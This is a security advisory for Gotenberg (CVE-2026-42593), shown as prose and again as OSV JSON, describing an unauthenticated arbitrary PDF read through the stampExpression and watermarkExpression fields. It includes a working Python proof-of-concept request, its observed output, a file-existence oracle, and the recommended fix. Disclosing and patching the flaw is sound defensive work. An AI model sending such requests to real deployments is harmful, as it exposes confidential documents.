GHSA-3CV5-Q585-H563

Vulnerability from github – Published: 2026-05-07 00:59 – Updated: 2026-05-14 20:52
VLAI?
Summary
Gotenberg has arbitrary PDF read via stampExpression and watermarkExpression in merge, split, and convert routes
Details

Summary

Six conversion routes (pdfengines/merge, pdfengines/split, libreoffice/convert, chromium/convert/url, chromium/convert/html, chromium/convert/markdown) accept stampSource=pdf + stampExpression=/path and watermarkSource=pdf + watermarkExpression=/path from anonymous callers. The dedicated stamp/watermark routes require an uploaded file when the source type is image or pdf; these six routes only overwrite the expression when a file is uploaded, leaving the user-controlled path intact when no file is attached. pdfcpu opens the path and composites its pages onto the output PDF, which returns to the caller. An attacker reads any PDF the Gotenberg process can access on the container filesystem.

Details

The dedicated stamp route at pkg/modules/pdfengines/routes.go:1322-1332 rejects requests missing the stamp file:

if stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {
    if stampFile == "" {
        return api.WrapError(errors.New("no stamp file provided"), ...)
    }
    stamp.Expression = stampFile
}

The merge, split, LibreOffice, and Chromium routes use a lax pattern across twelve call sites (six stamp + six watermark):

// pkg/modules/pdfengines/routes.go:679-683 (merge), 803 (split);
// pkg/modules/libreoffice/routes.go:307-311;
// pkg/modules/chromium/routes.go:433-438, 508-513, 592-597
if (stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF) && stampFile != "" {
    stamp.Expression = stampFile
}
if (watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF) && watermarkFile != "" {
    watermark.Expression = watermarkFile
}

When stampFile == "" (no file attached to the stamp form field), the guard short-circuits and stamp.Expression keeps the raw user-supplied stampExpression form string. The same pattern applies to watermarkFile/watermarkExpression.

pkg/modules/pdfcpu/pdfcpu.go:635 forwards the expression straight to the pdfcpu CLI:

args := []string{"stamp", "add", "-mode", "pdf", "--", stamp.Expression, onDesc, inputPath, outputPath}
cmd, err := gotenberg.CommandContext(ctx, logger, cfg.BinPath, args...)

pdfcpu reads the target PDF at that path and composites its pages as a stamp on every page of the merged output.

Proof of Concept

Reproduction on the stock Docker image. The scenario models a deployment that mounts host paths into the container (common for document-processing pipelines) or where another request leaves a PDF in the shared /tmp filesystem:

docker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8
docker exec gotenberg-poc sh -c 'cat > /tmp/victim_doc.pdf' < victim.pdf

Where victim.pdf contains extractable text such as BOB-CONFIDENTIAL-CONTRACT-2026-04-20.

Alice attacks without auth:

import requests, io, subprocess
T = "http://localhost:3000"

minimal = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
           b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
           b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n"
           b"xref\n0 4\n0000000000 65535 f \n0000000009 00000 n \n"
           b"0000000058 00000 n \n0000000115 00000 n \n"
           b"trailer\n<< /Size 4 /Root 1 0 R >>\nstartxref\n180\n%%EOF\n")

r = requests.post(
    f"{T}/forms/pdfengines/merge",
    files={"file1": ("a.pdf", io.BytesIO(minimal), "application/pdf"),
           "file2": ("b.pdf", io.BytesIO(minimal), "application/pdf")},
    data={"stampSource": "pdf", "stampExpression": "/tmp/victim_doc.pdf"},
    timeout=30,
)
print(f"HTTP {r.status_code} bytes={len(r.content)}")
open("/tmp/out.pdf", "wb").write(r.content)
print(subprocess.run(["pdftotext", "/tmp/out.pdf", "-"],
                     capture_output=True, text=True).stdout)

Observed output against gotenberg 8.31.0:

HTTP 200 bytes=1852
BOB-CONFIDENTIAL-CONTRACT-2026-04-20
...

Non-PDF targets via stampSource=pdf (for example /etc/hostname) return HTTP 500 after pdfcpu fails to parse the file as PDF, which acts as a file-existence oracle. stampSource=image with non-image files returns HTTP 400 (image parsing rejects it). The same PoC applies with stampSource replaced by watermarkSource and stampExpression by watermarkExpression.

Impact

Any anonymous caller with access to port 3000 reads PDF files from any path the Gotenberg process can open. In the default Docker image with no volume mounts, the reachable set is limited to /tmp/<gotenberg-work-uuid>/<request-uuid>/*.pdf (files staged during another in-flight request) and any PDF files the base image happens to ship. In deployments that bind-mount host directories into the container (document processing pipelines, shared storage for Office document conversion), the attacker reads arbitrary PDF files under those mount points. The file-existence oracle additionally lets the attacker probe for the presence of non-PDF files anywhere the process can read.

Recommended Fix

Apply the dedicated stamp route's guard to all six stamp call sites and all six watermark call sites:

if stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {
    if stampFile == "" {
        return api.WrapError(
            errors.New("no stamp file provided for image or pdf source"),
            api.NewSentinelHttpError(http.StatusBadRequest,
                "Invalid form data: a stamp file is required for image or pdf source"),
        )
    }
    stamp.Expression = stampFile
}
if watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF {
    if watermarkFile == "" {
        return api.WrapError(
            errors.New("no watermark file provided for image or pdf source"),
            api.NewSentinelHttpError(http.StatusBadRequest,
                "Invalid form data: a watermark file is required for image or pdf source"),
        )
    }
    watermark.Expression = watermarkFile
}

Call sites: pkg/modules/pdfengines/routes.go:679-683 (merge), :803-807 (split), pkg/modules/libreoffice/routes.go:307-311, pkg/modules/chromium/routes.go:433-438 (url), :508-513 (html), :592-597 (markdown), plus each route's watermark counterpart.


Found by aisafe.io

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gotenberg/gotenberg/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "8.31.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42593"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T00:59:50Z",
    "nvd_published_at": "2026-05-14T16:16:22Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nSix conversion routes (`pdfengines/merge`, `pdfengines/split`, `libreoffice/convert`, `chromium/convert/url`, `chromium/convert/html`, `chromium/convert/markdown`) accept `stampSource=pdf` + `stampExpression=/path` and `watermarkSource=pdf` + `watermarkExpression=/path` from anonymous callers. The dedicated stamp/watermark routes require an uploaded file when the source type is image or pdf; these six routes only overwrite the expression when a file is uploaded, leaving the user-controlled path intact when no file is attached. pdfcpu opens the path and composites its pages onto the output PDF, which returns to the caller. An attacker reads any PDF the Gotenberg process can access on the container filesystem.\n\n## Details\n\nThe dedicated stamp route at `pkg/modules/pdfengines/routes.go:1322-1332` rejects requests missing the stamp file:\n\n```go\nif stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {\n    if stampFile == \"\" {\n        return api.WrapError(errors.New(\"no stamp file provided\"), ...)\n    }\n    stamp.Expression = stampFile\n}\n```\n\nThe merge, split, LibreOffice, and Chromium routes use a lax pattern across twelve call sites (six stamp + six watermark):\n\n```go\n// pkg/modules/pdfengines/routes.go:679-683 (merge), 803 (split);\n// pkg/modules/libreoffice/routes.go:307-311;\n// pkg/modules/chromium/routes.go:433-438, 508-513, 592-597\nif (stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF) \u0026\u0026 stampFile != \"\" {\n    stamp.Expression = stampFile\n}\nif (watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF) \u0026\u0026 watermarkFile != \"\" {\n    watermark.Expression = watermarkFile\n}\n```\n\nWhen `stampFile == \"\"` (no file attached to the `stamp` form field), the guard short-circuits and `stamp.Expression` keeps the raw user-supplied `stampExpression` form string. The same pattern applies to `watermarkFile`/`watermarkExpression`.\n\n`pkg/modules/pdfcpu/pdfcpu.go:635` forwards the expression straight to the pdfcpu CLI:\n\n```go\nargs := []string{\"stamp\", \"add\", \"-mode\", \"pdf\", \"--\", stamp.Expression, onDesc, inputPath, outputPath}\ncmd, err := gotenberg.CommandContext(ctx, logger, cfg.BinPath, args...)\n```\n\npdfcpu reads the target PDF at that path and composites its pages as a stamp on every page of the merged output.\n\n## Proof of Concept\n\nReproduction on the stock Docker image. The scenario models a deployment that mounts host paths into the container (common for document-processing pipelines) or where another request leaves a PDF in the shared `/tmp` filesystem:\n\n```bash\ndocker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8\ndocker exec gotenberg-poc sh -c \u0027cat \u003e /tmp/victim_doc.pdf\u0027 \u003c victim.pdf\n```\n\nWhere `victim.pdf` contains extractable text such as `BOB-CONFIDENTIAL-CONTRACT-2026-04-20`.\n\nAlice attacks without auth:\n\n```python\nimport requests, io, subprocess\nT = \"http://localhost:3000\"\n\nminimal = (b\"%PDF-1.4\\n1 0 obj\\n\u003c\u003c /Type /Catalog /Pages 2 0 R \u003e\u003e\\nendobj\\n\"\n           b\"2 0 obj\\n\u003c\u003c /Type /Pages /Kids [3 0 R] /Count 1 \u003e\u003e\\nendobj\\n\"\n           b\"3 0 obj\\n\u003c\u003c /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] \u003e\u003e\\nendobj\\n\"\n           b\"xref\\n0 4\\n0000000000 65535 f \\n0000000009 00000 n \\n\"\n           b\"0000000058 00000 n \\n0000000115 00000 n \\n\"\n           b\"trailer\\n\u003c\u003c /Size 4 /Root 1 0 R \u003e\u003e\\nstartxref\\n180\\n%%EOF\\n\")\n\nr = requests.post(\n    f\"{T}/forms/pdfengines/merge\",\n    files={\"file1\": (\"a.pdf\", io.BytesIO(minimal), \"application/pdf\"),\n           \"file2\": (\"b.pdf\", io.BytesIO(minimal), \"application/pdf\")},\n    data={\"stampSource\": \"pdf\", \"stampExpression\": \"/tmp/victim_doc.pdf\"},\n    timeout=30,\n)\nprint(f\"HTTP {r.status_code} bytes={len(r.content)}\")\nopen(\"/tmp/out.pdf\", \"wb\").write(r.content)\nprint(subprocess.run([\"pdftotext\", \"/tmp/out.pdf\", \"-\"],\n                     capture_output=True, text=True).stdout)\n```\n\nObserved output against gotenberg 8.31.0:\n\n```\nHTTP 200 bytes=1852\nBOB-CONFIDENTIAL-CONTRACT-2026-04-20\n...\n```\n\nNon-PDF targets via `stampSource=pdf` (for example `/etc/hostname`) return HTTP 500 after pdfcpu fails to parse the file as PDF, which acts as a file-existence oracle. `stampSource=image` with non-image files returns HTTP 400 (image parsing rejects it). The same PoC applies with `stampSource` replaced by `watermarkSource` and `stampExpression` by `watermarkExpression`.\n\n## Impact\n\nAny anonymous caller with access to port 3000 reads PDF files from any path the Gotenberg process can open. In the default Docker image with no volume mounts, the reachable set is limited to `/tmp/\u003cgotenberg-work-uuid\u003e/\u003crequest-uuid\u003e/*.pdf` (files staged during another in-flight request) and any PDF files the base image happens to ship. In deployments that bind-mount host directories into the container (document processing pipelines, shared storage for Office document conversion), the attacker reads arbitrary PDF files under those mount points. The file-existence oracle additionally lets the attacker probe for the presence of non-PDF files anywhere the process can read.\n\n## Recommended Fix\n\nApply the dedicated stamp route\u0027s guard to all six stamp call sites and all six watermark call sites:\n\n```go\nif stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {\n    if stampFile == \"\" {\n        return api.WrapError(\n            errors.New(\"no stamp file provided for image or pdf source\"),\n            api.NewSentinelHttpError(http.StatusBadRequest,\n                \"Invalid form data: a stamp file is required for image or pdf source\"),\n        )\n    }\n    stamp.Expression = stampFile\n}\nif watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF {\n    if watermarkFile == \"\" {\n        return api.WrapError(\n            errors.New(\"no watermark file provided for image or pdf source\"),\n            api.NewSentinelHttpError(http.StatusBadRequest,\n                \"Invalid form data: a watermark file is required for image or pdf source\"),\n        )\n    }\n    watermark.Expression = watermarkFile\n}\n```\n\nCall sites: `pkg/modules/pdfengines/routes.go:679-683` (merge), `:803-807` (split), `pkg/modules/libreoffice/routes.go:307-311`, `pkg/modules/chromium/routes.go:433-438` (url), `:508-513` (html), `:592-597` (markdown), plus each route\u0027s watermark counterpart.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-3cv5-q585-h563",
  "modified": "2026-05-14T20:52:32Z",
  "published": "2026-05-07T00:59:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-3cv5-q585-h563"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42593"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gotenberg/gotenberg"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gotenberg has arbitrary PDF read via stampExpression and watermarkExpression in merge, split, and convert routes"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…